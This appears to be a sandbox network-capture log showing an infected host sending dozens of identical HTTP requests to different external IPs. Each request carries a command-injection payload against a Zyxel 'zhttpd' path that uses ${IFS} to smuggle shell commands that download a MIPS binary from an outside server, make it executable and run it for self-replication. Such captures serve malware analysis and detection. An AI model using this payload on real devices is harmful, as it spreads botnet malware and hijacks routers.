                                                Jan 12, 2024 18:24:39.963071108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5419192.168.2.1337044125.67.145.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963124990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5420192.168.2.1337802160.70.83.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963150024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5421192.168.2.1352336167.221.65.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963212967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5422192.168.2.1359216221.1.7.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963272095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5423192.168.2.1355728150.123.79.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963329077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5424192.168.2.1337634184.112.201.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963403940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5425192.168.2.1342302121.113.80.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963447094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5426192.168.2.135694417.146.214.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963501930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5427192.168.2.1337932134.27.79.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963545084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5428192.168.2.1348544183.55.171.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963622093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5429192.168.2.13552601.126.225.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963695049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5430192.168.2.1333336175.24.202.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963718891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5431192.168.2.1360308148.54.8.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963759899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5432192.168.2.135769048.208.158.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963831902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5433192.168.2.1356190183.187.179.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963891029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5434192.168.2.134533838.175.22.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963933945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5435192.168.2.135368449.56.31.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963995934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5436192.168.2.1337284131.246.111.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964056015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5437192.168.2.1337600197.233.88.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964142084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5438192.168.2.1358042160.41.198.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964179039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5439192.168.2.1356032153.42.127.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964229107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5440192.168.2.1353658130.22.184.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964298010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5441192.168.2.1355102102.29.216.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964335918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5442192.168.2.1339528179.237.60.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964390039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5443192.168.2.13533221.172.35.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964437008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5444192.168.2.135837490.124.137.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964503050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5445192.168.2.1349334183.155.159.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964560986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5446192.168.2.1359376195.195.0.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964622974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5447192.168.2.135763264.108.26.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964688063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5448192.168.2.1359378153.92.38.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964721918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5449192.168.2.1341276157.234.199.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964790106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5450192.168.2.133670632.128.211.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964839935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5451192.168.2.1342658193.189.77.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964911938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5452192.168.2.133830051.91.30.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.964977026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5453192.168.2.1346970209.49.47.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965001106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5454192.168.2.133585449.220.20.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965053082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5455192.168.2.1352538216.115.201.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965150118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5456192.168.2.134794081.63.130.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965204000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5457192.168.2.1341762166.26.1.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965265036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5458192.168.2.134472066.21.164.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965327978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5459192.168.2.1357284146.143.46.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965369940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5460192.168.2.1359322175.14.121.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965430975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5461192.168.2.133809074.55.25.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965461969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5462192.168.2.1342498121.209.62.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965528011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5463192.168.2.1336906208.23.228.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965590000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5464192.168.2.1349340148.120.202.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965667009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5465192.168.2.134060023.174.4.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965701103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5466192.168.2.133723090.155.34.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965773106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5467192.168.2.1354810124.144.0.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965792894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5468192.168.2.1356038223.4.8.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965847015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5469192.168.2.1336360179.252.133.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965914965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5470192.168.2.133425688.253.210.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.965972900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5471192.168.2.1352958132.139.30.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966031075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5472192.168.2.1348610210.180.177.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966101885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5473192.168.2.134942854.169.79.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966150045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5474192.168.2.1337716144.113.114.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966212988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5475192.168.2.1358616108.76.152.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966306925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5476192.168.2.1341354188.7.159.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966357946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5477192.168.2.1338002169.240.250.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966427088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5478192.168.2.1333950167.24.162.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966480017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5479192.168.2.1343560116.112.76.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966522932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5480192.168.2.134376437.110.59.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.966558933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5481192.168.2.134572254.247.216.199443
                                                TimestampBytes transferredDirectionData
